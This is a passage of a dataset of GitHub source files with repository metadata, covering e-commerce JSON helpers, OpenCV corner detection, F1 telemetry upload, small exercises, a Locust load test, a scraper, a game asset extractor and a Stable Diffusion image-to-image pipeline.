product_json_data[product_ID] = product_data\n with open(product_json_file, 'w') as f:\n json.dump(product_json_data, f)\n \n print('Product created successfully!')\n return True\n\ndef Read_Products(owner,product_json_file):\n '''Reading Products created by the admin(owner)'''\n products=[]\n f=open(product_json_file,'r+')\n content=json.load(f)\n for i in range(len(content)):\n if content[i][\"owner\"]==owner:\n products.append(content[i])\n \n f.close()\n return products\n \n\ndef Read_Product_By_ID(product_json_file,product_ID,Details):\n '''Reading product by ID'''\n with open(product_json_file, 'r') as f:\n products = json.load(f)\n \n if product_ID not in products:\n print(f\"Product with ID {product_ID} does not exist.\")\n return None\n \n product = products[product_ID]\n if Details == 'all':\n return product\n elif Details in product:\n return product[Details]\n else:\n print(f\"Invalid details requested: {Details}\")\n return None\n\ndef Update_Product(product_json_file,product_ID,detail_to_be_updated,new_value):\n '''Updating Product || Return True if successfully updated else False'''\n\n f=open(product_json_file,'r+')\n content=json.load(f)\n for i in range(len(content)):\n if content[i][\"product_ID\"]==product_ID:\n \n try:\n a=content[i][detail_to_be_updated]\n except KeyError:\n return False\n \n content[i][detail_to_be_updated]=new_value\n f.seek(0)\n f.truncate()\n json.load(content,f)\n f.close()\n return True\n f.close()\n return False\n \n \ndef Delete_Product(product_json_file,product_ID):\n '''Deleting Product || Return True if successfully deleted else False'''\n \n f=open(product_json_file,'r+')\n content=json.load(f)\n for i in range(len(content)):\n if content[i][\"product_ID\"]==product_ID:\n del content[i]\n f.seek(0)\n f.truncate()\n json.dump(content,f)\n f.close()\n return True\n f.close()\n return False\n\ndef Update_Member(member_json_file,name,detail_to_be_updated,new_value):\n '''Updating Member Details || Return True if successfully updated else False'''\n f=open(member_json_file,'r+')\n content=json.load(f)\n for i in range(len(content)):\n if content[i][\"name\"]==name:\n \n try:\n a=content[i][detail_to_be_updated]\n except KeyError:\n return False\n \n content[i][detail_to_be_updated]=new_value\n f.seek(0)\n f.truncate()\n json.load(content,f)\n f.close()\n return True\n f.close()\n return False\n \n \n \n\ndef Place_Order(order_json_file,ordered_by,delivery_address,product_json_file,product_ID,Quantity,Order_ID):\n '''Placing Order, Calculate the Price after discount and Total cost of the order || Return True if order placed successfully else False'''\n with open(product_json_file, 'r') as f:\n products = json.load(f)\n \n if product_ID not in products:\n print(f\"Product with ID {product_ID} does not exist.\")\n return False\n \n product = products[product_ID]\n price = product['price']\n discount = product['discount']\n discounted_price = price * (1 - discount/100)\n total_cost = discounted_price * Quantity\n \n order = {\n 'ordered_by': ordered_by,\n 'delivery_address': delivery_address,\n 'product_ID': product_ID,\n 'product_name': product['product_name'],\n 'quantity': Quantity,\n 'price': discounted_price,\n 'total_cost': total_cost\n }\n \n try:\n with open(order_json_file, 'r') as f:\n orders = json.load(f)\n except FileNotFoundError:\n orders = {}\n \n if Order_ID in orders:\n print(f\"Order with ID {Order_ID} already exists.\")\n orders[Order_ID] = order\n with open(order_json_file, 'w') as f:\n json.dump(orders, f, indent=4)\n return True\n \n\ndef Order_History(order_json_file,Name,details):\n '''Append the order information into details list'''\n try:\n with open(order_json_file, 'r') as f:\n orders = json.load(f)\n except FileNotFoundError:\n orders = {}\n for order_ID, order in orders.items():\n if order['ordered_by'] == Name:\n details.append(order)\n if len(details)>0:\n return True\n else:\n return False\n \n\n","repo_name":"MEKALAAKHILKUMAR/prject","sub_path":"operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":7716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14417702474","text":"import cv2 as cv\r\nimport numpy as np\r\nfrom Feature import read\r\nimport copy\r\n\r\n\r\ndef Harris():\r\n name = 'Lena'\r\n pic = read.get_pics(0, name)\r\n print(pic.shape)\r\n # 求出x,y方向上的Ix,Iy矩阵图\r\n # 对于Sobel这里的trick,参照https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_imgproc/py_gradients/py_gradients.html\r\n # 一定要用浮点形式做运算,后再求绝对值,再转换回uint8\r\n picx = cv.Sobel(pic, cv.CV_64F, 1, 0)\r\n picy = cv.Sobel(pic, cv.CV_64F, 0, 1)\r\n picx = np.abs(picx)\r\n picy = np.abs(picy)\r\n picx = np.uint8(picx)\r\n picy = np.uint8(picy)\r\n # 得到IxIx, IyIy 和 IxIy的矩阵图\r\n picxx = np.zeros(picx.shape, dtype=np.float32)\r\n picyy = np.zeros(picx.shape, dtype=np.float32)\r\n picxy = np.zeros(picx.shape, dtype=np.float32)\r\n for i in range(picx.shape[0]):\r\n for j in range(picx.shape[1]):\r\n picxx[i][j] = picx[i][j]**2\r\n picyy[i][j] = picy[i][j]**2\r\n picxy[i][j] = float(picx[i][j]) * float(picy[i][j])\r\n print(picxy.dtype)\r\n # 高斯模糊滤波,我认为是最重要的一步\r\n picxx = cv.GaussianBlur(picxx, (3, 3), 5)\r\n picyy = cv.GaussianBlur(picyy, (3, 3), 5)\r\n picxy = cv.GaussianBlur(picxy, (3, 3), 5)\r\n # 求R = det(M)-0.04*trace(M)^2, trace表示对角线的和,也是两个特征值的和\r\n # 角点R是大正数,边缘是R大负数,平区域是|R|小\r\n R = np.zeros(picx.shape, dtype=np.float32)\r\n correspond = np.zeros(picx.shape, dtype=np.uint8)\r\n for i in range(picx.shape[0]):\r\n for j in range(picx.shape[1]):\r\n a = picxx[i][j]\r\n b = picyy[i][j]\r\n c = picxy[i][j]\r\n # 以下注释的是验证是否可以去掉det项,事实证明,如果不做高斯模糊项,\r\n # 是完全可以去掉的,但同时也就不会有角点检测出来了\r\n # v1 = (a*b - c*c)-0.04*(a+b)*(a+b)\r\n # v2 = - 0.04 * (a + b) * (a + b)\r\n # if v1 != v2:\r\n # print('a', a, 'b', b, 'c', c)\r\n # print('picx', picx[i][j], 'picy', picy[i][j])\r\n R[i][j] = (a*b - c*c)-0.04*(a+b)*(a+b)\r\n if R[i][j] > 1e+8:\r\n correspond[i][j] = 2 # 2表示角点\r\n elif R[i][j] < -1e+7:\r\n correspond[i][j] = 1 # 1表示边缘\r\n\r\n color_pic = read.get_pics(1, name)\r\n edge_color_pic = copy.copy(color_pic)\r\n for i in range(picx.shape[0]):\r\n for j in range(picx.shape[1]):\r\n if correspond[i][j] == 2:\r\n cv.circle(color_pic, (j, i), 1, (255, 255, 0))\r\n if correspond[i][j] == 1:\r\n cv.circle(edge_color_pic, (j, i), 1, (0, 0, 255))\r\n cv.imshow('coner', color_pic)\r\n cv.imshow('edge', edge_color_pic)\r\n\r\n # Shi-Tomasi Corner Detector\r\n # arg1:需要的角点数目\r\n # arg2:算法中lemda的最小阈值,两个lemda都大于它,就认为是角点,取值0-1\r\n # arg3:两个角点最小间隔\r\n # 若arg1给定数目小于利用lemda数值检测出的角点个数,第二个参数实际上是失效的\r\n corners = cv.goodFeaturesToTrack(pic, 100, 0.01, 10)\r\n corners = np.int16(corners) # corners输出来是浮点型的\r\n shi_pic = read.get_pics(1, name)\r\n for i in corners:\r\n x, y = i.ravel() # 因为很奇怪,corners的每个点输出格式为二维数组,即[[x, y]]\r\n cv.circle(shi_pic, (x, y), 3, (255, 0, 255), -1)\r\n cv.imshow('SHI', shi_pic)\r\n cv.waitKey(0)\r\n\r\n\r\nif __name__ == '__main__':\r\n Harris()\r\n\r\n","repo_name":"AriaTZY/AR-transparent-driving","sub_path":"Feature/Harris.py","file_name":"Harris.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70543163123","text":"import json\nimport f1_2020_telemetry.types\n\nfrom receiver.session_base import SessionBase\nfrom receiver.f12020.api import F1LapsAPI\nfrom receiver.f12020.telemetry import Telemetry\nfrom lib.logger import log\n\n\nclass Session(SessionBase):\n \"\"\"\n Handles all session-specific variables and logic\n \"\"\"\n def __init__(self, session_uid):\n ###################################################\n # Attributes set on Session start\n ###################################################\n self.session_udp_uid = session_uid\n self.track_id = None\n self.session_type = None\n self.weather_ids = []\n self.f1laps_api_key = None\n self.telemetry_enabled = True\n self.is_online_game = False\n\n ###################################################\n # Attributes set with participants packet once\n ###################################################\n self.team_id = None\n\n ###################################################\n # Attributes set with each lap\n ###################################################\n self.lap_list = {}\n self.lap_number_current = None\n\n ###################################################\n # Attributes set with the setup package\n ###################################################\n self.setup = {}\n\n ###################################################\n # Attributes set with the telemetry package\n ###################################################\n self.telemetry = Telemetry()\n\n ###################################################\n # Attributes set with the final classification\n ###################################################\n self.finish_position = None\n self.result_status = None\n self.points = None\n\n ###################################################\n # Attributes set via F1Laps API\n ###################################################\n self.f1_laps_session_id = None\n\n def process_lap_in_f1laps(self, lap_number=None):\n \"\"\"\n Send Lap to F1Laps; either as a standalone lap or as a session lap,\n depending on game mode\n \"\"\"\n if self.session_type_supported_by_f1laps_as_session():\n # Create or update full Session object in F1Laps\n return self.create_or_update_session_in_f1laps()\n else:\n # Create only Lap object in F1Laps\n return self.create_lap_in_f1laps(lap_number)\n\n def create_lap_in_f1laps(self, lap_number):\n \"\"\" Send Lap to F1Laps \"\"\"\n response = F1LapsAPI(self.f1laps_api_key, \"f12020\").lap_create(\n track_id = self.track_id,\n team_id = self.team_id,\n conditions = self.map_weather_ids_to_f1laps_token(),\n game_mode = \"time_trial\", # hardcoded as the only supported value\n sector_1_time = self.lap_list[lap_number][\"sector_1_time_ms\"],\n sector_2_time = self.lap_list[lap_number][\"sector_2_time_ms\"],\n sector_3_time = self.lap_list[lap_number][\"sector_3_time_ms\"],\n setup_data = self.setup,\n is_valid = self.lap_list[lap_number].get(\"is_valid\", True),\n telemetry_data_string = self.get_lap_telemetry_data(lap_number)\n )\n if response and response.status_code == 201:\n log.info(\"Lap #%s successfully created in F1Laps\" % lap_number)\n return True\n else:\n log.error(\"Error creating lap %s in F1Laps\" % lap_number)\n log.error(\"F1Laps API response: %s\" % json.loads(response.content))\n return False\n\n def create_or_update_session_in_f1laps(self):\n log.info(\"Updating session (%s) in F1Laps\" % self.map_udp_session_id_to_f1laps_token())\n success,self.f1_laps_session_id = F1LapsAPI(self.f1laps_api_key, \"f12020\").session_create_or_update(\n f1laps_session_id = self.f1_laps_session_id,\n track_id = self.track_id,\n team_id = self.team_id,\n session_uid = self.session_udp_uid,\n conditions = self.map_weather_ids_to_f1laps_token(),\n session_type = self.map_udp_session_id_to_f1laps_token(),\n finish_position = self.finish_position,\n points = self.points,\n result_status = self.result_status, \n lap_times = self.get_f1laps_lap_times_list(),\n setup_data = self.setup,\n is_online_game = self.is_online_game\n )\n if success:\n log.info(\"Session (%s) successfully updated in F1Laps\" % self.map_udp_session_id_to_f1laps_token())\n return True\n else:\n log.info(\"Session not updated in F1Laps\")\n return False\n\n def map_udp_session_id_to_f1laps_token(self):\n session_mapping = {\n 1: \"practice_1\",\n 2: \"practice_2\",\n 3: \"practice_3\",\n 4: \"practice_1\", # short practice\n 5: \"qualifying_1\", # q1\n 6: \"qualifying_2\", # q2\n 7: \"qualifying_3\", # q3\n 8: \"qualifying\", # short q\n 9: \"qualifying\", # osq\n 10: \"race\",\n 11: \"race\",\n 12: \"time_trial\",\n }\n return session_mapping.get(self.session_type)\n\n def session_type_supported_by_f1laps_as_session(self):\n return True if self.session_type and self.session_type != 12 else False\n\n def get_f1laps_lap_times_list(self):\n lap_times = []\n for lap_number, lap_object in self.lap_list.items():\n if lap_object['sector_1_time_ms'] and lap_object['sector_2_time_ms'] and lap_object['sector_3_time_ms']:\n lap_times.append({\n \"lap_number\" : lap_number,\n \"sector_1_time_ms\" : lap_object['sector_1_time_ms'],\n \"sector_2_time_ms\" : lap_object['sector_2_time_ms'],\n \"sector_3_time_ms\" : lap_object['sector_3_time_ms'],\n \"car_race_position\" : lap_object['car_race_position'],\n \"pit_status\" : lap_object['pit_status'],\n \"tyre_compound_visual\" : lap_object.get('tyre_compound_visual'),\n \"telemetry_data_string\": self.get_lap_telemetry_data(lap_number)\n })\n return lap_times\n\n def get_track_name(self):\n return f1_2020_telemetry.types.TrackIDs.get(self.track_id)\n\n\n","repo_name":"f1laps/f1laps-telemetry","sub_path":"receiver/f12020/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"7857037409","text":"from vezba3_Geometrija import Tacka, Duz\n\ndef kreirajDuz(xt1, yt1, xt2, yt2):\n p = Tacka(xt1, yt1)\n k = Tacka(xt2, yt2)\n d = Duz(p, k)\n return d\n\ndef isFloat(n):\n try:\n float(n)\n return True\n except ValueError:\n return False\n\nduzi = []\nt1 = 0\nt2 = 0\np = input(\"Unesi koordinate pocetne tacke duzi u obliku 'x,y':\")\nwhile True==True:\n if len(p.split(\",\"))==2:\n px = p.split(\",\")[0]\n py = p.split(\",\")[1]\n if isFloat(px) and isFloat(py) == True:\n t1 = Tacka(float(px), float(py))\n break\n else:\n p = input(\"Unesi koordinate pocetne tacke duzi u obliku 'x,y':\")\n else:\n p = input(\"Unesi koordinate pocetne tacke duzi u obliku 'x,y':\")\nk = input(\"Unesi koordinate krajnje tacke duzi u obliku 'x,y':\")\nwhile True==True:\n if len(k.split(\",\"))==2:\n kx = k.split(\",\")[0]\n ky = k.split(\",\")[1]\n if isFloat(kx) and isFloat(ky) == True:\n t2 = Tacka(float(kx), float(ky))\n break\n else:\n k = input(\"Unesi koordinate krajnje tacke duzi u obliku 'x,y':\")\n else:\n k = input(\"Unesi koordinate krajnje tacke duzi u obliku 'x,y':\")\n\nduz1 = Duz(t1,t2)\nduzi.append(duz1)\n\nduz2 = 0\nt = input(\"Unesi koordinate pocetne i krajnje tacke duzi u obliku 'px,py,kx,ky':\")\nwhile True==True:\n if len(t.split(\",\"))==4:\n px, py, kx, ky = t.split(\",\")[0], t.split(\",\")[1], t.split(\",\")[2], t.split(\",\")[3]\n if isFloat(px) and isFloat(py) and isFloat(kx) and isFloat(ky) == True:\n duz2 = kreirajDuz(float(px),float(py),float(kx),float(ky))\n break\n else:\n t = input(\"Unesi koordinate pocetne i krajnje tacke duzi u obliku 'px,py,kx,ky':\")\n else:\n t = input(\"Unesi koordinate pocetne i krajnje tacke duzi u obliku 'px,py,kx,ky':\")\nprint(\"-----\")\nduzi.append(duz2)\nfor d in duzi:\n d.duzInfo()\n\ndxk = input(\"Unesi vrednost za koju zelis izmeniti x koordinatu krajnje tacke prve duzi (dx):\")\ndyk = input(\"Unesi vrednost za koju zelis izmeniti y koordinatu krajnje tacke prve duzi (dy):\")\nwhile True == True:\n if isFloat(dxk) and isFloat(dyk):\n dxk = float(dxk)\n dyk = float(dyk)\n break\n else:\n dxk = input(\"Unesi vrednost za koju zelis izmeniti x koordinatu krajnje tacke (dx):\")\n dyk = input(\"Unesi vrednost za koju zelis izmeniti y koordinatu krajnje tacke (dy):\")\n\nduz1.t_krajnja.x_pomeraj(duz1.t_krajnja.x+dxk)\nduz1.t_krajnja.y_pomeraj(duz1.t_krajnja.y+dyk)\nprint(\"-----\")\nfor d in duzi:\n d.duzInfo()","repo_name":"StefanStamenkovic/Git","sub_path":"vezba3_Geometrija_test.py","file_name":"vezba3_Geometrija_test.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"75326620083","text":"#Importing the libraries\nimport cv2\n#Reading image using opencv\ni=cv2.imread('face.jpeg')\n#Printing shape of image\nprint(i.shape)\n#Printing the stored image array\nprint(i)\n#Converting to grayscale\ni_gray=cv2.imread('face.jpeg',0)\n#Selecting region in the image\nr=cv2.selectROI(i)\n#Displaying the selected area\nprint(r)\n#Changing colour of selected region to red\ni[r[1]:r[1]+r[3],r[0]:r[0]+r[2],0]=0\ni[r[1]:r[1]+r[3],r[0]:r[0]+r[2],1]=0\ni[r[1]:r[1]+r[3],r[0]:r[0]+r[2],2]=255\n#Displaying the output\ncv2.imshow(i)\ncv2.waitkey(0)\n#Replacing ROI with an image\nk=cv2.imread('spongebob.jpg')\n#Pasting new image in ROI by resizing it\nk1=cv2.resize(k,(r[2],r[3]))\ni[r[1]:r[1]+r[3],r[0]:r[0]+r[2]]=k1\ncv2.imshow(\"Modified image\",i)\ncv2.waitkey(0)\n","repo_name":"Tanishasharma11/Image-Processing","sub_path":"Making_spongebob_filter.py","file_name":"Making_spongebob_filter.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"22611232652","text":"import logging.config\n\nfrom django.core.management.base import BaseCommand\n\nfrom crawler.models import *\n\nlogger = logging.getLogger('crawler.command')\n\n\nclass Command(BaseCommand):\n help = 'Generate comparison between google similar app and ours'\n\n def handle(self, *args, **options):\n compatibility_count = 0\n similar_apps = SimilarApp.objects.filter().all()\n for similar_app in similar_apps:\n if self.is_compatible_with_google(similar_app):\n compatibility_count = compatibility_count + 1\n\n admin_file = open('comparison.csv', 'w')\n admin_file.write('{};{}\\n'.format('Percentage of Compatibility', 'Total Similarity'))\n admin_file.write('{};{}\\n'.format(float(compatibility_count) / len(similar_apps), len(similar_apps)))\n admin_file.close()\n self.stdout.write(self.style.SUCCESS(\n 'Compatible Count: {} - Similar Count: {}'.format(compatibility_count, len(similar_apps))))\n\n @staticmethod\n def is_compatible_with_google(similar_app):\n count = GoogleSimilarApp.objects.filter(\n source_package=similar_app.source_package,\n similar_package=similar_app.similar_package\n ).count()\n\n if count > 0:\n return True\n\n count = GoogleSimilarApp.objects.filter(\n source_package=similar_app.similar_package,\n similar_package=similar_app.source_package\n ).count()\n\n if count > 0:\n return True\n\n return False\n","repo_name":"bkosawa/admin-recommendation","sub_path":"crawler/management/commands/compare_my_similar_with_google_similar.py","file_name":"compare_my_similar_with_google_similar.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29236417513","text":"# https://www.acmicpc.net/problem/1238\n# 파티\n# 다익스트라\nfrom collections import *\nimport heapq as H, sys\nR=range\nI=lambda:map(int,sys.stdin.readline().split())\ng=defaultdict(dict)\nn,m,x=I();n+=1\nfor _ in R(m):s,e,t=I();g[s][e]=t\ndef D(s):\n q=[];d=[1e6]*n;H.heappush(q,(0,s));d[0]=0;d[s]=0\n while q:\n c,s=H.heappop(q)\n if d[s]x:d[e]=x;H.heappush(q,(x,e))\n return d\nr=D(x)\nfor i in R(1,n):r[i]+=D(i)[x]\nprint(max(r))\n\n# 접근 1) X를 제외한 도시 -> X 시간 + X -> 도시 복귀 시간 중 최대값 찾기 \n# 최대 시간: 100*1000이므로 대충 1e6\n","repo_name":"StaySharp0/algorithm","sub_path":"dijkstra/1238.py","file_name":"1238.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70779300721","text":"\ndef bubble_sort1(A):\n for i in range(0, len(A) - 1):\n done = True\n for j in range(0, len(A) - i - 1):\n if A[j] > A[j + 1]:\n A[j], A[j + 1] = A[j + 1], A[j]\n done = False\n if done:\n return\n\n\nA = [5, 9, 1, 2, 4, 8, 6, 3, 7]\nprint(A)\nbubble_sort1(A)\n","repo_name":"HamdiKaptan/Python_Search_and_Sort","sub_path":"funcs/buble_sort.py","file_name":"buble_sort.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14289090880","text":"from selenium import webdriver\r\nimport pytest\r\nfrom locators import MAIN_PAGE_URL\r\n\r\n\r\n@pytest.fixture(scope=\"function\")\r\ndef chrome_drv():\r\n global driver\r\n driver = webdriver.Chrome(executable_path=r\"C:/Users/Oks_Sunshine/Downloads/chromedriver_win32/chromedriver.exe\")\r\n driver.maximize_window() # maximize the page\r\n driver.implicitly_wait(30)\r\n\r\n\r\ndef srart_page(chrome_drv):\r\n driver.get(MAIN_PAGE_URL)\r\n\r\n\r\n","repo_name":"EvgeniySalar/booking_test","sub_path":"book/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37826521011","text":"# -*- coding: utf-8 -*-\r\nimport os, sys\r\n\r\n\r\nimport numpy as np\r\nfrom matplotlib.pyplot import *\r\nimport load_ene as ee\r\ndata = np.load('ENE_data.npy')\r\n#date,time,_=ee.load_data()\r\nX = data[:,7]\r\nX = X[::47]\r\nC = X\r\nfor i in range(4):\r\n X = np.append(X,C)\r\nmatplotlib.rcParams.update({'font.size': 16})\r\n\r\nsubplot(1,1,1)\r\nylabel(u'Spotřeba energie [kW]')\r\nxlabel('Vzorky[15 min.]')\r\nplot(X,'k',linewidth=0.5)\r\nshow()\r\n","repo_name":"marfay/Polynomial-Neural-Networks-D.Thesis-2017-","sub_path":"App for NN tunning and forecasting/day_examination.py","file_name":"day_examination.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21365173616","text":" #!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 1 12:09:02 2021\n\n@author: alexander\n\"\"\"\nimport requests\n#from bs4 import BeautifulSoup\nimport os\n\ndef downLoadImg(urlp,nompost, x, fileDownland):\n Image = fileDownland\n img = nompost\n filePath = Image # file path for the directory\n originPath = os.getcwd()\n # create directory for required images poster\n if not os.path.exists(filePath): # if the dir doesn't exist\n os.makedirs(filePath) # create the dir\n \n # move to new directory\n os.chdir(filePath)\n pathFinish = os.getcwd()\n try:\n url = urlp\n response = requests.get(url) # go to the url and store it in the response var\n if response.status_code == 200:\n nameFilepath = img + '-' + str(x) + '.jpg' \n with open(nameFilepath, 'wb') as f: # open the image as the mentioned file format, (w for writing, and b for binary)\n print(response)\n f.write(requests.get(url).content) # get the content of the url and write/save in the created dir\n f.close() # stop writing/saving the image\n pathFinish += \"/\" + nameFilepath\n except:\n print('Image not found')\n pass # repeat the loop again \n os.chdir(originPath)\n print(pathFinish)\n return pathFinish\n#-----------------------------------------------------------------\n\n# url = \"https://pelisplus.me/pelicula/life-in-a-year/\"\n# page = requests.get(url)\n# soup = BeautifulSoup(page.content,'html.parser')\n\n# poster = soup.find('img',{'id':'cover'})['src']\n# print(downLoadImg(poster, 'life-in-a-year',1,'poster'))\n","repo_name":"alexanderJPV/webScarping_BeautifulSoup","sub_path":"examples/pelisPlus/scrapMovie.py","file_name":"scrapMovie.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43126151806","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport mmap\nimport optparse\nimport os\nimport sys\nimport time\n\nimport starbound\n\n\ndef main():\n p = optparse.OptionParser('Usage: %prog ')\n p.add_option('-d', '--destination', dest='path',\n help='Destination directory')\n options, arguments = p.parse_args()\n # Validate the arguments.\n if len(arguments) != 1:\n p.error('Only one argument is supported (package path)')\n package_path = arguments[0]\n base = options.path if options.path else '.'\n # Load the assets file and its index.\n start = time.clock()\n with open(package_path, 'rb') as fh:\n mm = mmap.mmap(fh.fileno(), 0, access=mmap.ACCESS_READ)\n package = starbound.SBAsset6(mm)\n print('Loading index...')\n # Get the paths from the index in the database.\n package.read_index()\n print('Index loaded. Extracting {} files...'.format(package.file_count))\n # Start extracting everything.\n num_files = 0\n percentage_count = max(package.file_count // 100, 1)\n for path in package.index:\n dest_path = base + path\n dir_path = os.path.dirname(dest_path)\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n try:\n data = package.get(path)\n except:\n # Break the dots in case std{out,err} are the same tty:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n print >>sys.stderr, 'W: Failed to read', path\n continue\n with open(dest_path, 'wb') as file:\n file.write(data)\n num_files += 1\n if not num_files % percentage_count:\n sys.stdout.write('.')\n sys.stdout.flush()\n elapsed = time.clock() - start\n print('')\n print('Extracted {} files in {:.1f} seconds.'.format(num_files, elapsed))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"blixt/py-starbound","sub_path":"starbound/cliexport.py","file_name":"cliexport.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"75"} +{"seq_id":"36806575163","text":"from locust import HttpLocust, TaskSet, task\n\n\nclass UserBehavior(TaskSet):\n token = None\n def on_start(self):\n self.getPhotoById()\n\n\n\n @task(1)\n def getPhotoById(self):\n params = {\n \"id\": 1\n }\n self.client.get(\"/GetPhoto\", params = params)\n\nclass WebsiteUser(HttpLocust):\n host = 'http://localhost:4200'\n\n task_set = UserBehavior\n min_wait = 5000\n max_wait = 9000\n","repo_name":"yueyue200830/MeetHere","sub_path":"performance test/Independent Test/Independent Test1.py","file_name":"Independent Test1.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17899243044","text":"#%%\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport phd.viz\nimport phd.thermo\ncolors, palette = phd.viz.phd_style()\n\n# Define a concentration range\nc_range = np.logspace(-2, 4, 200)\npact = phd.thermo.MWC(ka=200, ki=1, ep_ai=5, effector_conc=c_range).pact()\n\n# %%\nfig, ax = plt.subplots(1, 1, figsize=(3, 2))\nphd.viz.despine(ax)\nax.set_xscale('log')\nax.plot(c_range, pact, '-', color=colors['blue'], lw=1)\nax.set_xlabel('inducer concentration')\nax.set_ylabel('probability of being active')\nax.set_ylim([0, 1.1])\nax.set_xticklabels([])\nplt.savefig('../figs/fig3_plot.svg', bbox_inches='tight')\n# %%\n","repo_name":"gchure/phd","sub_path":"src/chapter_01/code/ch1_fig3.py","file_name":"ch1_fig3.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"24246147396","text":"from typing import Any, Callable, Dict, List, Optional, Union\n\nimport numpy as np\nimport PIL\nimport torch\nfrom diffusers import StableDiffusionImg2ImgPipeline\nfrom diffusers.pipelines.stable_diffusion import StableDiffusionPipelineOutput\nfrom diffusers.utils import deprecate, randn_tensor\n\n\nclass MagicMixStableDiffusionImg2ImgPipeline(StableDiffusionImg2ImgPipeline):\n def prepare_latents(\n self,\n image,\n timestep,\n batch_size,\n num_images_per_prompt,\n dtype,\n device,\n generator=None,\n ):\n if not isinstance(image, (torch.Tensor, PIL.Image.Image, list)):\n raise ValueError(\n f\"`image` has to be of type `torch.Tensor`, `PIL.Image.Image` or list but is {type(image)}\"\n )\n\n image = image.to(device=device, dtype=dtype)\n\n batch_size = batch_size * num_images_per_prompt\n\n if image.shape[1] == 4:\n init_latents = image\n\n else:\n if isinstance(generator, list) and len(generator) != batch_size:\n raise ValueError(\n f\"You have passed a list of generators of length {len(generator)}, but requested an effective batch\"\n f\" size of {batch_size}. Make sure the batch size matches the length of the generators.\"\n )\n\n elif isinstance(generator, list):\n init_latents = [\n self.vae.encode(image[i : i + 1]).latent_dist.sample(generator[i])\n for i in range(batch_size)\n ]\n init_latents = torch.cat(init_latents, dim=0)\n else:\n init_latents = self.vae.encode(image).latent_dist.sample(generator)\n\n init_latents = self.vae.config.scaling_factor * init_latents\n\n if (\n batch_size > init_latents.shape[0]\n and batch_size % init_latents.shape[0] == 0\n ):\n # expand init_latents for batch_size\n deprecation_message = (\n f\"You have passed {batch_size} text prompts (`prompt`), but only {init_latents.shape[0]} initial\"\n \" images (`image`). Initial images are now duplicating to match the number of text prompts. Note\"\n \" that this behavior is deprecated and will be removed in a version 1.0.0. Please make sure to update\"\n \" your script to pass as many initial images as text prompts to suppress this warning.\"\n )\n deprecate(\n \"len(prompt) != len(image)\",\n \"1.0.0\",\n deprecation_message,\n standard_warn=False,\n )\n additional_image_per_prompt = batch_size // init_latents.shape[0]\n init_latents = torch.cat(\n [init_latents] * additional_image_per_prompt, dim=0\n )\n elif (\n batch_size > init_latents.shape[0]\n and batch_size % init_latents.shape[0] != 0\n ):\n raise ValueError(\n f\"Cannot duplicate `image` of batch size {init_latents.shape[0]} to {batch_size} text prompts.\"\n )\n else:\n init_latents = torch.cat([init_latents], dim=0)\n\n shape = init_latents.shape\n noise = randn_tensor(shape, generator=generator, device=device, dtype=dtype)\n\n # get latents\n image_latents = init_latents\n init_latents = self.scheduler.add_noise(init_latents, noise, timestep)\n\n latents = init_latents\n\n return latents, image_latents, noise\n\n def get_timesteps(self, num_inference_steps, k_max, device):\n # get the original timestep using init_timestep\n init_timestep = min(int(num_inference_steps * k_max), num_inference_steps)\n\n t_start = max(num_inference_steps - init_timestep, 0)\n timesteps = self.scheduler.timesteps[t_start * self.scheduler.order :]\n\n return timesteps, num_inference_steps - t_start\n\n @torch.no_grad()\n def __call__(\n self,\n prompt: Union[str, List[str]] = \"\",\n image: Union[\n torch.FloatTensor,\n PIL.Image.Image,\n np.ndarray,\n List[torch.FloatTensor],\n List[PIL.Image.Image],\n List[np.ndarray],\n ] = None,\n num_inference_steps: Optional[int] = 50,\n guidance_scale: Optional[float] = 7.5,\n negative_prompt: Optional[Union[str, List[str]]] = None,\n num_images_per_prompt: Optional[int] = 1,\n eta: Optional[float] = 0.0,\n generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None,\n prompt_embeds: Optional[torch.FloatTensor] = None,\n negative_prompt_embeds: Optional[torch.FloatTensor] = None,\n output_type: Optional[str] = \"pil\",\n return_dict: bool = True,\n callback: Optional[Callable[[int, int, torch.FloatTensor], None]] = None,\n callback_steps: int = 1,\n 